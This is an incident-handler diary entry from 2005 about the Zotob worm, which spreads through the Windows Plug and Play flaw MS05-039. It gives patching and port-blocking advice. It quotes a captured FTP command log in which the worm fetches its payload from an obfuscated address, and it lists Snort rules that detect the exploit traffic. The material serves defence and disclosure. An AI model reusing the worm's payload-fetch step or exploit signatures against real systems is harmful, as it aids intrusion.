MS05-039 Worm in the wild

Published: 2005-08-14
Last Updated: 2005-09-13 12:10:42 UTC
by Tony Carothers (Version: 1)
0 comment(s)

-039 is NOT Microsoft's lucky number

One of our readers, John Smith, submitted this:

"Interesting game of numbers:

SQL Slammer was using bug fixed in MS02-039

Zotob is using bug fixed in MS05-039

Hex 39 is 57 decimal, which is big W (Worm? Windows?) in ASCII."

Update (2005-08-15@10:43UTC): hex 39 is ASCII "9", but hex 57 is ASCII "W". Maybe it's a conspiracy involving the American National Standards Institute (ANSI)? OK, maybe not. -Josh

The technical details:

Starting around 11:30 UTC, we've received several reports on a new worm variant that makes use of MS05-039 to spread. If you're not patched yet, this is your last call.

F-Secure named the critter "Zotob.A",http://www.f-secure.com/weblog/

We've also received a submission of a binary called "pnpsrv.exe", which is recognized by ClamAV as Trojan.Spybot-123. Another reader has contributed evidence that a successful exploit by Zotob.A (or variant)

The worm will download the main payload from the infecting machine. Once a machine is infected, it will become an ftp server itself. It will scan for open port 445/tcp. Once it finds a system with port 445 listening, it will try to use the PnP exploit to download and execute the main payload via ftp.

Important facts so far:
- Patch MS05-039 will protect you
- Windows XP SP2 and Windows 2003 can not be exploited by this worm, as the worm does not use a valid logon.
- Blocking port 445 will protect you (but watch for internal infected systems)
- The FTP server does not run on port 21. It appears to pick a random high port.


Quick FTP log:
  open aaa.bbb.ccc.ddd 31656  user 1 1  get winpnp.exe  quit  
(IP address obfuscated). We'll keep adding to this diary as new information becomes available.

Thanks so far to Johnathan Norman from for a lot of the details.
Other good information can be found at the F-Sececure weblog at
http://www.f-secure.com/weblog/
Also see the Microsoft MS05-039 bulletin from last week: http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx Please submit any new code captures via our contact page:
http://isc.sans.org/contact.php
If possible, do not pack/encrypt the uploads, maybe provide an md5 sum to preserve the code in its original beauty.

Shown below are Snort rules, submitted by the members of the Alert Logic Security Research Team:
Jeremy Hewlett, Technical Director of Security Research
Johnathan Norman, Sr. Security Analyst
Chris Baker, Technical Director of Security Operations


alert tcp any any -> any 445 (msg:"EXPLOIT SMB-DS Microsoft Windows 2000 Plug and Play Vulnerability"; flow:to_server,established; content:"|FF|SMB%"; depth:5;offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|67157a76|";reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000130; rev:1;)

alert tcp any any -> any 139 (msg:"EXPLOIT NETBIOS SMB Microsoft Windows 2000 PNP Vuln"; flow:to_server,established; content:"|FF|SMB%"; depth:5;offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|3600|"; offset:110; within:5; content:"|F6387A76|";reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000131; rev:1;)

alert tcp any any -> any 445 (msg:"EXPLOIT NETBIOS SMB-DS Microsoft Windows 2000 PNP Vuln"; flow:to_server,established; content:"|FF|SMB%"; depth:5;offset: 4; nocase; content:"|2600|"; depth:2; offset:65; content:"|3600|"; offset:110; within:5; content:"|F6387A76|";reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000132; rev:1;)

----------------
Handlers contributing to this diary so far:
Daniel Weseman, Johannes Ullrich, Tony Carothers, William Salusky and Donald Smith.

Keywords:
0 comment(s)

Comments


Diary Archives